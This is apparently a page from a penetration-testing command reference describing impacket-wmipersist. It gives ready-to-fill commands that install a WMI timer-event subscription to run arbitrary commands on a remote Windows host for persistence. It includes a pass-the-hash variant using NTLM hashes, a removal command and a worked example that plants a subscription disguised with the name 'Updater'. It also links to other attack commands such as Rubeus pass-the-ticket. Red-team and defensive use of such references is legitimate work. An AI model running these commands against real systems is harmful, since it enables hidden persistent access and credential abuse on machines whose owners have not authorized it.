Impacket WMI Persist
Install or remove WMI event subscriptions for remote persistence
- Tool
- impacket-wmipersist
- Category
- Post-Exploitation / Persistence
- Platform
- linux
- Requires
- password
- Protocols
- WMI
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-wmipersist '<domain>/<user>:<password>'@'<ip>' -action install -name '<name>' -executeOn 'TimerEvent' -command '<cmd>'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
impacket-wmipersist -hashes ':<hash>' '<domain>/<user>'@'<ip>' -action install -name '<name>' -executeOn 'TimerEvent' -command '<cmd>'
Remove Persistence requires password
impacket-wmipersist '<domain>/<user>:<password>'@'<ip>' -action remove -name '<name>'
Examples
impacket-wmipersist 'CORP.LOCAL/user:password'@192.168.1.100 -action install -name 'Updater' -executeOn 'TimerEvent' -command 'cmd.exe /c whoami > C:\\out.txt'
Tags
Related commands
- Impacket Scheduled Tasks Create, delete, or run scheduled tasks on a remote host via ATSVC
- Rubeus ptt (Pass-the-Ticket) Inject a Kerberos ticket into the current logon session. Accepts base64 from asktgt/s4u…